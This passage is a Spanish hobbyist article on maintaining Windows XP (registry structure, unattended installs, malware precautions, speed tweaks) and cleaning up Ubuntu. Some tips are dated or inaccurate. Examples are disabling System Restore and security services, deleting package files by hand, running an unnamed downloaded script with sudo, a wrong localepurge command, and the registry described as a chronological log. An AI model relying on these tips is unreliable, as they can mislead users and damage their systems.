>> - Re direccionamiento de la salida estándar a un fichero existente. Su sintaxis es comando >> fichero.
Filtros
•
•
•
•
| - Pipe o tubería, concatena comandos.
| more - Separa por páginas la salida estándar, (Ejemplo: DIR | MORE).
|sort - Ordena por orden alfabético la salida estándar.
|find - Busca una cadena de texto en la salida estándar.
3.5 2x1=DOS
Tan sencilla como esta regla matemática resulta la mecánica de funcionamiento del DOS basándose en la combinación de
caracteres para generar un resultado. Si lo analizamos detenidamente MS-DOS no es más que un patrón de
programación, en este caso la programación Windows. Si nos fijamos cualquier lenguaje de programación ya sea de alto
nivel o no tiene un funcionamiento bastante similar ya que en la programación cualquier aplicación es desarrollada a
través de una secuencia determinada de caracteres que nos ofrecen como resultado un proceso, lo mismo que realizamos
cuando redireccionamos los comandos del dos a través de esa secuencia de caracteres. Todo el material expuesto en este
artículo no es más que una breve síntesis del potencial de MS-DOS. Por lo que aquellos que deseen adquirir un
conocimiento avanzado en las aplicaciones de Windows y en programación en general debe continuar el estudio de su
funcionamiento.
4.0 Radiografiando Windows: Su Esqueleto Reside En El Registro
Si analizamos Windows como si radiografiásemos a un ser humano comprobaríamos que Windows también cuenta con
un soporte estructural al que podríamos denominar esqueleto, el pilar fundamental que estructura el organigrama del
funcionamiento del sistema seria algo así como el centro de operaciones donde se ejecutan todas las ordenes ,procesos y
que guarda toda la información de vital importancia. A ese cuaderno de bitácora se le denomina registro, por motivos
obvios, en el se encuentran archivados cronológicamente todos los sucesos desde la puesta en funcionamiento del
sistema en su instalación hasta los acontecimientos mas actuales. Por todo esto el registro es la parte más delicada del
sistema y por eso la más problemática a la que deberemos prestar especial atención para salvaguardar el correcto
funcionamiento del sistema operativo.
4.1 Analizando el registro, sus partes
Para acceder al menú de registro en Windows debemos usar la siguiente ruta: desde el menú inicio>ejecutar>y escribimos
el comando regedit, una vez hecho esto se nos abrirá la siguiente ventana donde podremos visualizar la información
donde accederemos a las opciones fundamentales de registro con todas las claves y subclaves.
Como se puede apreciar en esta imagen al acceder a la ventana principal del registro lo primero que nos encontramos son
cinco desplegables que abarcan las principales funciones derivadas de Mi PC, continuación vamos a especificar y detallar
el uso que se le asigna a cada una de ellas.
HKEY_CLASSES_ ROOT La información que se almacena aquí garantiza que cuando abra un archivo con el
Explorador de Windows se abrirá el programa correcto.
HKEY_CURRENT_USER Contiene la raíz de la información de configuración del usuario que ha iniciado sesión. Las
carpetas del usuario, los colores de la pantalla y la configuración del Panel de control se almacenan aquí.
HKEY_LOCAL_MACHINE Contiene información de configuración específica del equipo (para cualquier usuario).
HKEY_USERS Contiene todos los perfiles de usuario cargados activamente en el equipo.
HKEY_CURRENT_CONFIG Contiene información acerca del perfil de hardware que utiliza el equipo local cuando se
inicia el sistema.
Bien, como podemos observar todas las funciones y aplicaciones que ejecuta Windows están intercomunicadas a través
del registro, por lo que un fallo en cualquiera de sus datos puede ocasionar un desequilibrio en el sistema cuya gravedad
será determinada por la importancia de la clave o subclave que haya sufrido la modificación errónea. Es muy importante
que tengamos esto en cuenta cuando nos dispongamos a modificar cualquier dato en el registro puesto que si nos
equivocamos podemos afectar al funcionamiento de una o varias aplicaciones del sistema incluso podemos dañarlo
seriamente e imposibilitar su recuperación.
4.2 Problemas más comunes del Registro de Windows.
Acabamos de nombrar uno de los problemas más recurrentes del registro de Windows que suele ser en la mayoría de los
casos erróneas modificaciones realizadas por usuarios inexpertos que desconocen el significado o valor del elemento
modificado, pero esta no es la única causa que puede originar errores en nuestro sistema puesto que esta causa podríamos
denominarla como “voluntaria” ya que el usuario es consciente de que procede a realizar una modificación asumiendo los
riesgos que esta puede ocasionar, pero existen otras causas “involuntarias” que generalmente escapan a nuestro control y
en la mayoría de los casos no se detectan a tiempo, lo que produce que el sistema operativo se vuelva cada vez mas lento
e inestable perdiendo su funcionabilidad inicial. Algunas de ellas pueden ser:
* Errores en la instalación/desinstalación de programas Cuando instalamos un nuevo programa el registro asume los
valores de las claves y subclaves que necesita dicho programa para funcionar cada vez que usamos ese programa estamos
generando nuevas entradas para su posterior utilización. Cuando nos disponemos a desinstalar un programa, normalmente
usamos un asistente de desinstalación como pueden ser el agregar/quitar programas de Windows o el asistente de
desinstalación del mismo programa, por lo que la eliminación del programa suele ser parcial, ya que el asistente logra
eliminar la mayor parte de las entradas de registro se crearon en el momento de la instalación pero en muchas ocasiones
no llegan a eliminarse la totalidad de entradas que se generaron en el periodo de utilización del mismo, algo que al tiempo
es causa ralentización e incluso puede ocasionarnos conflictos con otros programas que instalemos.
* Incompatibilidad en la instalación de aplicaciones de software Puede darse el caso que en algún momento
instalemos programas que por su ingeniería de software resulten completamente incompatibles, esta situación es algo
inusual y solo podría ocurrir si nuestro registro esta dañado o no funcionase correctamente por lo que no lograríamos
detectar el error, por ejemplo el antivirus NOD32 es incompatible con Kaspersky el asistente de instalación de uno obliga
la desinstalación previa del otro pero si la desinstalación no se ejecuto correctamente o no se eliminaron todas las claves
del registro puede llegar a quedar alguna entrada residente que fluctúe con el funcionamiento del programa.
* Malwares Los malvares en general y los virus en particular causan innumerables daños al registro en muchas ocasiones
conseguimos deshacernos del virus en cuestión pero no eliminamos las entradas de su registro en Windows o no podemos
estabilizar las aplicaciones que se vieron afectadas por el.
* Software que origina problemas de detección de hardware Pues si, hay programas que pueden llegar a desestabilizar
el equilibrio armónico de nuestro hardware ocasionándonos problemas que antes no teníamos, ejemplo de ello serian los
programas creadores de unidades virtuales de disco tales como alcohol 120 Daemon Tools, etc. Muchas veces con la
desinstalación de este software no logramos desinstalar la unidad que fue creada por lo que Windows interpreta esto como
un fallo, que se aloja en el registro y en ocasiones se manifiesta como como hardware no reconocido pudiendo ocasionar
fallos en nuestra unidad de disco real como que no se puedan leer datos o incluso puede no estar visible.
* Exceso de aplicaciones instaladas Sobrecargar nuestro sistema con aplicaciones innecesarias hacen que se vuelva
lento e inestable, por lo que cada vez que vallamos a añadir una nueva funciona a través de la instalación de un nuevo
programa seria muy útil reflexionar primero sobre si realmente lo necesitamos y estar seguros de que no va interferir con
ninguna otra aplicación que tengamos ya instalada. Hay que tener en cuenta que el cómputo total de aplicaciones y
utilidades que poseemos no son solo los programas sino todo elemento ajeno a Windows que hemos añadido para que
desempeñe una función complementaria.
* Exceso de entradas vacías e inutilizables Como hemos visto, las numerosas instalaciones y desinstalaciones de
programas dejan secuela en el registro de Windows pues en pocas ocasiones se consiguen eliminar la totalidad de
entradas creadas por nuestras instalaciones y dejar el registro en el estado inicial, por lo que este se va deteriorando
progresivamente y uno de los principales síntomas es la lentitud.
4.3 Soluciones a la problemática del registro
Con los conocimientos adecuados casi todos los problemas tienen solución y el registro de Windows no es una excepción
para esto por lo que se pueden plantear soluciones viables para cada uno de los problemas mencionados en el punto
anterior.
*Completar la desinstalación de los programas Cuando vallamos a desinstalar un programa que no queramos usar
debemos eliminar también sus entradas, para ello podemos usar un desinstalador que incluya esta función (como
Regcleaner) o eliminar las entradas manualmente
* Ínstala solo software compatible. Debemos asegurarnos cuando procedamos a instalar una nueva aplicación en nuestra
maquina la total compatibilidad con el resto de componentes que tengamos instalados.
* Fulmina a los malware Para minimizar el daño de las aplicaciones malignas es conveniente detectarlas cuanto antes,
para ello cualquier antivirus que posea una buena heurística servirá y para que el resultado sea efectivo deberíamos
combinar el antivirus con un potente antispyware.
* No instales ningún programa ni componente del cual desconozcas su funcionamiento. Te ahorraras muchos dolores
de cabeza y algún que otro formateo si antes de instalar algún componente como una unidad virtual, te lees un manual
para aprender a instalarla correctamente y asegurarte de que la desinstalación se no va a ocasionar problemas.
* Consigue ayuda extra Existen muchas utilidades que pueden ayudarte a mantener el registro en buen estado
prolongando la estabilidad de tu sistema, son programas que incluyen funciones como limpieza de registro, optimización,
compresión…….o todas juntas simplemente es cuestión de probar y valorar los resultados, la oferta es verdaderamente
amplia.
5.0 Desatenciones y Descortesias ¿Qué es un Windows desatendido?
Después de conocer los entresijos del registro de Windows se llega a la conclusión que modificar su contenido resulta
extremadamente sencillo, la captación de esta idea ha tenido una gran magnitud entre los usuarios por lo que me parece
útil dedicar un breve espacio al desarrollo de la idea de modificar Windows mediante la cual se ha obtenido como
resultado multitud de versiones derivadas del patrón original a las que se le han llamado versiones modificadas o
desatendidas.
5.1 ¿En que consiste exactamente un Windows desatendido?
Pues generalmente se trata de efectuar modificaciones en las que normalmente se eliminan determinadas aplicaciones con
el objetivo de hacerlo más funcional y rápido .También se añaden programas de utilidad al paquete de instalación para
completar su contenido y suele distribuirse de manera gratuita por sus desarrolladores. El software se instala en una sola
sesión permitiendo al usuario decidir que programas desea instalar y cuales no. Todos los programas añadidos suelen
incluir licencias lo que facilita la tarea de la instalación. Algunas versiones desatendidas han resultado verdaderamente
populares entre los usuarios de Windows como por ejemplo las modificadas por Bj quien según los rumores concluyo su
serie de versiones desatendidas con su séptimo lanzamiento por supuestas presiones de Microsoft.
5.2 ¿Son fiables las versiones desatendidas de Windows?
Eso depende de su creador, si te decides a instalar una versión no oficial de Windows antes de es preferible constatar la
reputación de la versión que quieres instalar y evaluar todas las fuentes y comentarios de la misma pues si bien es cierto
que algunas han ofrecido excelentes resultados la fiabilidad no esta garantizada por ello. Debemos considerar que
Windows es un proyecto en expansión, es decir no esta cerrado sino que se actualiza constantemente, se renueva y se
modifica por lo cual es absolutamente mejorable. Por tanto es muy probable que puedan obtenerse versiones mas
perfectas que el mismo Windows, solo que muchas veces para la obtención de algo mejor se requieren largos procesos de
estudio para evaluar todos los detalles y como cada una de las modificaciones realizadas puede influir en el desarrollo del
sistema y la fiabilidad, por lo que este procedimiento no suele tenerse en cuenta a la hora de excluir aplicaciones y en
ocasiones pueden surgir problemas durante su uso, unos de los problemas mas generalizados en el uso de versiones
desatendidas suele estar en los controladores lo que ocasiona comúnmente problemas en la instalación de los drivers , la
causa probablemente se encuentre en que se han reducido la lista de los fabricantes a los de uso mas genérico por lo que
aquellas personas que adquieran un hardware de marcas poco conocidas pueden verse afectadas ya que su hardware no
pasara la prueba de reconocimiento de Windows y aunque puede omitirse este paso y continuar la instalación de todos
modos puede representar un problema de inestabilidad en el futuro u otras series de complicaciones por este motivo.
Además algunas de las aplicaciones excluidas que aparentemente resultan prescindibles, han sido integradas en Windows
por una razón algo que no debemos descartar para posibles restauraciones del sistema ,además si nos vemos obligados a
recurrir a algún manual de ayuda para resolver algún problema en el que debamos realizar modificaciones en el registro el
proceso puede no resultar el mismo la mayoría de tutoriales de reparación han sido extraídos total o parcialmente de
Microsoft por lo que si tu versión es modificada puedes no contener las mismas entradas de registro o incluso que te
falten valores establecidos por Microsoft cosa que puede dejarte solo ante el peligro y que tengas que reinstalarlo de
nuevo para subsanar el problema.
Por lo que mi consejo para resumir este punto seria que ante la duda de que versión de Windows instalar ,decantarse
siempre por la versión oficial y solo si buscamos potenciar los recursos de nuestro equipo para redireccionarlos hacia una
actividad especifica que nos obligue a “aligerar” Windows probemos una versión desatendida para evaluar si nos
compensa las modificaciones pero siempre teniendo en cuenta que vamos a poder prescindir de determinadas funciones
en el futuro que no suelen incluirse en las versiones desatendidas y que no vamos a depender constantemente de los
manuales de ayuda, pues es mas que probable que para determinados conflictos no nos sirvan.
5.3 Creando Windows. ¿Qué necesercito para crear mi propia versión desatendida?
Cualquiera que tenga algo de experiencia con Microsoft Windows y conocimientos básicos de cómo funcionan los
ficheros de proceso por lotes (batch) puede crear un Windows desatendido y ajustarlo según sus preferencias además de
tener conocimientos sobre scripting para la edición de archivos en batch para la construcción de las estructuras principales
como $OEM$,necesitaremos un programa que nos ayude a instalar las aplicaciones complementarias tales como service
pack ,drivers y los programas que queramos añadirle al paquete de instalación para eso usaremos el programa nlite,
software de licencia gratuita que nos ayudara a crear un archivo de imagen con todos los componentes de Windows y las
aplicaciones complementarias , permitiéndonos crear un CD booteable que podamos arrancar desde la unidad de disco y
ejecutar una instalación limpia con todo incluido. Existen muchos tutoriales por la red sobre el funcionamiento de Nlite y
de varios métodos de creación de Windows desatendidos.
6.0 Windows vs seguridad
Algo que ha preocupado siempre a la industria por las valoraciones recogidas entre los usuarios de Windows es su
aparente vulnerabilidad que consigue que sea presa continua de constantes infecciones de todo tipo de malware .La
propagación de las infecciones, es tal que se especula que el 90% de los ordenadores conectados a la red, estarían
infectados con algún tipo de software malicioso.
6.1 ¿Es Windows un sistema operativo inseguro?
Si partimos de la base que cualquier ordenador que tenga acceso a Internet es vulnerable, entonces cualquier sistema
operativo lo es, pero eso no explica porque Windows siempre se lleva la peor parte si lo comparamos con el resto de
sistemas operativos mas usados como Linux o MAC. Por eso una vez que hemos profundizado en Windows y entendido
su funcionamiento podemos comprender las razones por lo que es blanco fácil de infecciones. Una de los principales
motivos causantes de la vulnerabibilidad de Windows son fallos en su programación ejemplo de ello se refleja en su
sistema de archivos ya que graba la información desparramada por todo el disco duro (lo cual produce la famosa
fragmentación) y gasta los cabezales del disco duro haciéndolo trabajar en exceso. Si hemos seguido el historial de
versiones de Windows con atención, habremos comprobado que en sus primeros desarrollos no estaban incluidas las
funciones de red esto explica que el patrón original, no se fabrico con la pretensión de incluir esta función, algo que
conforme iba aumentando el uso generalizado de Internet obligo a Que Microsoft incluyese a marchas forzadas funciones
de red y modificar los patrones de seguridad conforme se iban añadiendo nuevas funciones ,pero el diseño primario no fue
pensado para esa función y no debemos olvidar que la secuencias de versiones Windows mantienen compatibilidad con
los prototipos mas antiguos por lo que parte de su código fuente sigue siendo el mismos salvaguardando las
actualizaciones. También contribuye la limitación de las cuentas de usuario, pues obliga en determinadas ocasiones a
acceder al sistema con privilegios de administrador con los riesgos que conlleva. Y por lo ultimo pero no menos
importante Windows es el sistema operativo mas popular y la elección mayoritaria de todos los usuarios que lo siguen
prefiriendo antes que a Mac por el precio de este ultimo y a Linux por la facilidad de uso lo que convierte a Windows en
el objetivo principal de los atacantes que pretenden llegar al mayor numero de usuarios.
6.2 ¿Entonces todo es culpa de Windows?
Que Windows tenga importantes Bugs de seguridad y sea propenso a ser atacado no significa que siempre que nos
infecten sea culpa del sistema, pues la forma en la que lo usamos es totalmente determinante para su correcto
funcionamiento.
6.3 ¿Que precauciones debo tomar para que no me infecten?
Como cualquier ordenador con conexión esta expuesto, debemos tomar una serie de medidas que ayude a nuestro
indefenso Windows a mantenerse a salvo de los ataques, no se trata de obsesionarse con el tema de la seguridad, sino
simplemente de ser un poco precavidos puesto que la mejor medida pasa por la prevención por lo que la mejor forma de
no infectarse es evitar que suceda para ello debemos de vigilar todo material que sea introducido en nuestro ordenador de
manera directa o indirecta:
* No abrir correos si no conocemos al remitente.
* Configurar nuestro programa asiduo de mensajera para que cualquier mensaje que llegue a nuestra bandeja de entrada
sea analizado por nuestro antivirus residente,
* Si descargamos software por Internet que sea siempre de páginas de confianza, puesto que un gran numero de
infecciones se contraen por descarga de programas de fuentes poco recomendables,
* Evitar todo lo posible crack o keygens que son por lo general un almacén de virus
* Vigilar los puertos que tenemos abiertos cerrando aquellos que sean peligrosos ya que algunos pueden ser una entrada
directa para troyanos.
* Ojo con los programas espías que aunque no son virus constituyen una seria amenaza para el funcionamiento de nuestra
maquina para evitarlos nada mejor que un buen antispyware.
* Vigilar los componentes que se instalan con los programas que más de uno suelen colar regalitos como una toolbar que
es una barrita de búsqueda que lleva un Spyware que recopila información sobre nuestras búsquedas y preferencias en la
red para usarlos con fines comerciales.
* Si aprecias tu seguridad cambia de navegador Web, esta absolutamente comprobado la falta de seguridad en Internet
Explorer, por lo que cualquier alternativa a este seria mas recomendable, Firefox es un estupendo navegador que además
incluye muchos complementos en su pagina oficial para poder personalizarlo a tu gusto
6.4 Ya me infectaron ¿Tiene solución?
Cuanto antes lo detectemos antes podremos reparar el daño ,si la infecciones es de un virus, gusano,
Troyano…..normalmente el antivirus nos da la voz de alarma, por lo que el problema suele solucionarse “in situ” ya que o
bien el antivirus evito la instalación o con un análisis a fondo se enviaron los archivos sospechosos a cuarentena, el
problema viene cuando la infección no ha sido detectada a tiempo y ha hecho estragos en el sistema, normalmente
solemos darnos cuenta porque el PC se ralentiza o porque comienzan a activarse aplicaciones que no hemos ejecutados y
otros errores similares. Aunque si el virus afecto severamente nuestro equipo podemos toparnos con problemas más serios
como que no podamos iniciar Windows o hayamos perdido parte de la informacion almacenada en el, ante cualquier
síntoma de amenaza deberemos de actuar de la siguiente forma.
* Arrancar el PC en modo seguro.
* Finalizar procesos sospechosos
* Mostrar archivos ocultos del sistema.
* Comprueba las carpetas de los programas por si se añadió algo que no estaba.
* Limpiar archivos temporales y el cache del navegador.
* Analizar el PC a fondo con el antivirus y el antispyware.
* Borrar las entradas que hubiese creado el virus en nuestro registro manualmente si fuese necesario.
*Si no lo solventamos con todo lo anterior podemos usar la consola de recuperación de Windows para restaurar el sistema
sin formatear.
* Formatear como ultimo recurso.
6.5 Congelando el registro. Windows eternamente joven
Una práctica alternativa a la restauración del sistema de Windows (que por otra parte puede llegar a ser peligrosa ya que
muchos virus pueden quedar residentes en la última restauración por tanto recuperar amenazas que habían sido
eliminadas) es congelar el registro. Esto se consigue con un programa como Deepfreeze una vez que hayamos completado
la instalación de Windows ejecutamos deepfreeze y este bloqueara el registro impidiendo cualquier cambio no autorizado.
El único inconveniente es que cada vez que instalemos algún programa que requiera crear entradas de registro para
funcionar tendremos que desbloquear deepfreeze por lo que no es un método muy recomendable para los que están
continuamente instalando y desinstalando aplicaciones.
7.0 Optimizando Windows
Cuando completamos la instalación de Windows y nos disponemos a hacer uso de el podemos comprobar que funciona
perfectamente respondiendo con agilidad y rapidez a nuestra manipulación, pero estas apreciadas cualidades van
desapareciendo progresivamente a medida que hacemos uso de el, ya hemos visto causas que pueden afectar a su
funcionamiento y ahora vamos a cerrar esta sección con una pequeña lista de consejos para sacarle el máximo partido.
* Como un coche necesita ir al taller de vez en cuando para una puesta a punto, Windows necesita ser reparado
periódicamente de los errores que se van acumulando en las sesiones de uso, para ello contamos con herramientas que
incluyen paquetes de aplicaciones básicas para su mantenimientos como limpiadores y correctores de registro
,limpiadores de archivos temporales etc. Podemos adquirir estas aplicaciones por separado o con un programa que incluya
las mas esenciales como por ejemplo el tune up utilities, paquete de utilidades de mantenimiento para Windows.
* Tener el PC bien configurado siempre ayuda; Si conocemos los recursos de nuestra maquina y le aplicamos una
configuración correcta el resultado será siempre mas optimo y se vera reflejado en el rendimiento.
* No instales demasiadas aplicaciones; Ya hemos visto lo que supone para el registro tener el PC sobrecargado y los
problemas que ocasiona, por lo que es recomendable instalar solo los programas que vayas a usar realmente.
* Portables o no portables e aquí la cuestión. Una buena alternativa para no tener el PC sobrecargado de programa es usar
versiones portables. Hubo un tiempo en el que los programas eran mucho mas livianos y no se requería la instalación en el
ordenador, pero la ampliación de los recursos de las maquinas y la suma de aplicaciones extras que comenzaron a añadirle
a los programas hicieron necesaria la instalación permanente de los mismos para funcionar. Pero con el uso generalizado
de memorias portátiles se volvió a la tendencia de hacer los programas mas ligeros y no tener que instalarlos, estas
versiones solo crean las entradas necesarias en el registro para funcionar pero no lo modifican como lo haría una
instalación permanente, aun así cabe destacar cuando es útil realizar un portable y cuando no.
Portables Si: En programas que consuman muchos recursos que no sean prescindibles para el funcionamiento de
Windows como por ejemplo Photoshop, grabadores, reproductores y en general cualquier programa de uso esporádico.
Portables No: El navegador Web, el antivirus un compresor, el reproductor de Windows media, la suite de oficina, el
visor PDF y al menos un programa de mensajería. Estos programas son recomendables que los tengas correctamente
instalados y actualizados en el PC.
* Y por ultimo voy a indicaros unas pequeñas modificaciones que me gusta hacer tal y como finalizo la instalación de
Windows que no interfieren en su funcionamiento pero que resultan increíblemente practicas.
- Tal y como instalo un Windows lo primero que hago es quitarle la palabra, es decir, dejarlo
Completamente mudo. A no ser que te encanten esos sonidos estridentes de cuando se abre y se cierra sesión por no
mencionar los esperpénticos sonidos de los errores no los vas a echar de menos, para ello abre la carpeta de Windows y
elimina todos los archivos de la carpeta media, ¡ojo!! Solo los archivos, no borres la carpeta si no quieres tener errores.
- Otra de las cosas mas inútiles que vienen incluidas en Windows por si no os habíais dado cuenta es el menú de ayuda
para no volver a toparnos con el volvemos a la carpeta Windows y eliminamos todos los archivos de la carpeta help. Si
eres de los que acude corriendo al solucionador de problemas cada vez que falla algo ni se te ocurra eliminarla pues no se
iniciaría nunca más.
- Una de las cosas más desesperantes de Windows es lo que tarda en abrir y cerrar sesion, algo que podemos aligerar
modificando algunas entradas de registro.
Para apagarlo mas rápido localizamos la siguiente clave de registro
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control Localiza nuevamente la clave WaitToKillAppTimeout y
vuelve a cambiar el valor de 20.000 por 4.000
Cerramos el Editor del Registro y ahora Windows esperará menos tiempo para cerrar las aplicaciones y el sistema.
Para que se encienda antes .Busca "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction"
Selecciona "Enable" de la lista de la derecha Botón derecho y selecciona 'Modificar'
Cambia el valor a "Y" Reinicia el ordenador.
- Deshabilita servicio innecesarios como Windows XP necesita ser un sistema orientado para todos tiene un montón de
servicios corriendo que ralentizan el sistema y que muchos de ellos no necesitas. Aquí hay una lista de los que pueden
deshabilitarse prácticamente en todas las máquinas:
* Servicio de alerta
* Portafolios
* Examinador de equipos
* Cliente de seguimiento de vínculos distribuidos
* Compatibilidad de cambio rápido de usuario
* Ayuda y Soporte técnico - (si usas la ayuda de windows alguna vez no lo toques)
* Acceso a dispositivo de interfaz humana
* Servicio de Index Server
* Servicios IPSEC
* Mensajero
* Escritorio remoto compartido de Netmeeting (deshabilitado por seguridad)
* Portable Media Serial Number Service
* Administrador de sesión de Ayuda de escritorio remoto (deshabilitado por seguridad)
* Administración de conexión automática de acceso remoto
* Registro remoto (deshabilitado por seguridad)
* Remote Registry Service
* Inicio de sesión secundario
* Enrutamiento y acceso remoto (deshabilitado por seguridad)
* Servidor
* Servicio de descubrimientos SSDP –
* Telnet
* Ayuda de NetBIOS sobre TCP/IP
* Administrador de carga
* Host dispositivo Plug and Play Universal
* Horario de Windows
* Configuración inalámbrica rápida (no lo desactives si usas WIFI)
* Estación de trabajo
Para poder deshabilitar esos servicios:
1. Ve a Inicio -> Ejecutar, y teclea "services.msc"
2. Pulsa doble click en el servicio que quieras deshabilitar
3. Cambia el tipo de inicio a "Deshabilitado" o "Disable" (según sistema)
- Deshabilita "Restaurar Sistema""Restaurar sistema" puede ser de gran ayuda si tu ordenador tiene problemas, aun así,
guardar todos los puntos de restauración puede ocupar gigas y gigas de espacio en tu disco duro. Por tanto, para
deshabilitarlo:
1. Abre el Panel de Control
2. Pulsa en "Rendimiento y Mantenimiento"
3. Pulsa en "Sistema"
4. Abre la pestaña de Restaurar Sistema
5. Activa 'Desactivar Restaurar sistema en todas las unidades'
6. Pulsa 'OK'
- Defragmenta el archivo de página Si mantienes defragmentado este archivo puedes tener un aumento considerable de
velocidad de arranque. Una de las mejores formas de hacer esto es crear una partición separada en tu disco duro sólo para
esto, con lo que no se ve afectado por el uso normal del disco duro. Otra forma de tener este archivo defragmentado es
correr la aplicación PageDefrag. Este pequeña y útil aplicación puede ser usada para defragmentarlo, pero también para
fijar que se defragmente cada vez que inicias el ordenador. Para instalarla:
1. Descarga y ejecuta PageDefrag
2. Señala "Defrag at next Reboot"
3. Pulsa "Aceptar"
4. Reinicia
- Acelera el acceso a carpetas - Deshabilita Last Access Update Si tienes muchas carpetas y subcarpetas en tu ordenador,
notarás que el acceso a dichas carpetas consume mucho tiempo, ya que Windows XP tiene que actualizar la hora de
último acceso a cada una de ellas. Para parar esto simplemente hay que editar el registro del sistema. Si crees que es
demasiado complicado no lo hagas, pero no es difícil..
1. Ve a Inicio -> Ejecutar y teclea "regedit"
2. Ves navegando por el árbol de la izquierda hasta llegar a
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem"
3. Pulsa con el botón derecho en el área de la ventana de la derecha y selecciona 'Valor DWORD'
4. Crea por tanto un nuevo valor DWORD y llámalo 'NtfsDisableLastAccessUpdate'
5. Botón derecho en el nuevo valor y pulsa 'Modificar'
6. Cambia el valor a '1'
7. Pulsa 'Aceptar'
-Haz que los menús vayan más rápido
1. Ve a Inicio -> Ejecutar
2. Teclea 'Regedit'
3. Busca la cadena "HKEY_CURRENT_USER\Control Panel\Desktop"
4. Selecciona "MenuShowDelay"
5. Botón derecho y selecciona 'Modificar'
6. Reduce el número a unos "100″
Este es el retardo en microsegundos que tienen los menús. Puedes ponerlo a "0″ pero te resultará un poco difícil usar
entonces los menús. Bueno ahora mira a ver el menú si te gusta y vá rápido. Si quieres puedes modificar estos valores
entrs 50 y 150 según tu gusto.
Funcionalidad y apariencia son dos cualidades reñidas por lo que si prefieres tener un equipo veloz yo que tu me
abstendría de llenar el escritorio de iconos ,de tener muchos programas ejecutándose al inicio de mi sesión y de poner
salvapantallas, themes o fondos de escritorio (utiliza los cuadros de tu casa) Porque todas esas cosas consumen recursos y
los que utilices para una cosa no los vas a poder usar para otra así que hay que establecer prioridades, por cierto la vista
clásica en las carpetas o tema clásico de Windows son los mas funcionales ,aunque no los mas atractivos, pero eso ya es
cuestión de preferencias, espero que os hayan servido estos consejos.
Seccion Linux
By: Lessiem
Limpiando Nuestro Linux
Estan todos tan contentos con el increíble funcionamiento de su nuevo sistema operativo. Anonadados con las increíbles
posibilidades que el software libre les brinda... vamos, como niños con zapatos (software) nuevos. Claro, hay tanto y tan
bueno y ¡gratis! que no son capaces de resistir la tentación de instalar e instalar y re-instalar...
Peeero, resulta que tras tanto instalar, poco a poco nos quedamos sin espacio en el disco duro (por muy bueno que sea
Linux, contra eso, todavía no puede hacer nada: "el espacio, el espacio"). Bueno, pues tenemos la opción de desinstalar
desde el Gestor de Paquetes Synaptic aquel software que hallamos instalado a través de este medio... ¿pero y todo esos
paquetes que hemos añadido por nuestra cuenta y riesgo desde el "exterior"?
Tranquilos, a continuación, les propongo unas simples acciones para, no sólo desistalar esos paquetes que no sabemos
como quitar de nuestra PC, sino también para mantener "up-to-date" nuestro sistema:
Paso 1) Updatedb: es un comando incluido en findutils que se encarga de actualizar una base de datos con todos los
achivos del sistema, utilizada por locate para hallar archivos rápidamente en sistemas de grandes cantidades de ficheros o
incluso distintos dispositivos y sistemas de ficheros. Hacemos:
sudo updatedb
Paso 2) Locate: es un comando del paquete findutils de GNU que provee una fácil y rápida manera de buscar archivos en
el sistema completo basado en patrones de nombres. El comando es mucho más rápido (aunque menos flexible) que find,
pues utiliza los datos en una base de datos temporal que almacena los nombres de todos los archivos en el sistema, por lo
que también se pueden experimentar fallas al buscar un archivo creado recientemente. Hacemos:
locate "nombre_del_paquete_a_desinstalar" | less
Paso 3) Localizamos todas las rutas de ficheros arrojados por locate en el terminal y, con un poco de paciencia, vamos
borrando poco a poco todas las entradas de los ficheros del paquete que queremos desinstalar.
A partir de este punto, podemos realizar los siguientes pasos de forma periódica sobre nuestro sistema para tenerlo al
100% de funcionamiento ya que, al igual que en otros Sistemas Operativos, tras muchas instalaciones y desinstalaciones,
Ubuntu puede quedar repleto de paquetes y claves innecesarias que lo único que hacen es ocupar espacio. Seguimos:
Paso 4) Eliminar paquetes residuales: Sistema->Administración-> Gestor de Paquetes Synaptic. Su función es eliminar
paquetes que quedaron en el sistema y que eran dependencias para instalar algún otro, pero que al desinstalarlo no se
eliminaron. Para hacerlo manualmente seleccionamos en la izquierda el filtro que pone: Estado -> No instalados (conf.
residual), y nos aparecerá una lista con todos ellos. Para eliminarlos pinchamos con el botón derecho sobre cada uno de
ellos y seleccionamos “Marcar para eliminar completamente“. Finalmente hacemos “Aplicar” para borrarlos por
completo del sistema.
NOTA: si no nos aparece la opción No instalados (conf. residual), ¡joya! tienes un sistema en perfecto funcionamiento.
Paso 5) Utilizar AutoClean: Esta es una opción incluída en el Apt del Sistema. Lo que hace es eliminar paquetes de
descargas incompletas o canceladas por alguna razón. Como no sirven para nada, simplemente abrimos una consola y
escribimos:
sudo apt-get autoclean
Y automáticamente se eliminarán todos esos paquetes: te sorprenderas de la cantidad de espacio que podes llegar a liberar
mediante esta opción.
Paso 6) Eliminar Traducciones: Un locale es un conjunto de reglas culturales que definen el país, idioma, caracteres y
otras preferencias de la interfaz del usuario. Cuando instalamos un programa, es probable que se instalen locales de varios
idiomas, por lo que a la larga tendremos el equipo lleno de traducciones que no nos interesan. Para eliminarlas instalamos
un paquete llamado localepurge:
sudo apt-get install localepurge
Inmediatamente después de instalarlo aparece una pantalla en el terminal donde se deben seleccionar los idiomas que
utilizaremos, en nuestro caso los del español y también ingles, ya que algunas aplicaciones no están traducidas. Puedes
quedarte con estos:
* en
* en_US
* en_US.ISO-8859-15
* en_US.UTF-8
* es_ar
* es_ES
* es_ES@euro
* es_ES.UTF-8
Para ejecutarlo posteriormente simplemente escribimos en una consola:
sudo locale
Lo interesante de este paquete es que posteriormente, al instalar alguna otra aplicación lo llama inmediatamente y elimina
del programa las traducciones en los idiomas que no marcamos.
Paso 7) Ubucleaner: es un script para Ubuntu que nos permite limpiar el cache del apt, remover los archivos de
configuracion de paquetes “deb” que se han desinstalado, remover los kernels instalados -y no quitar solo su llamada del
GRUB- (menos el que se esta usando, claro) y vacía las papeleras de todos los usuarios, de una manera rapida, sencilla y
transparente para el usuario.
¿Como usarlo?
Descargamos el script en cuestión desde aquí
Abrimos nuestra consola desde la carpeta donde hayamos guardado el fichero y damos permisos de ejecución al archivo
descargado.
chmod -c 744 71529-ubucleaner.sh
Ejecutamos el script:
sudo ./71529-ubucleaner.sh
Le decimos a todas las opciones que sí, y listo, Ubuntu como nuevo.
NOTA: No me hage responsable del posible mal funcionamiento de cualquiera de las herramientas de mantenimiento
mencionadas anteriormente (tampoco tienen por qué funcionar mal).
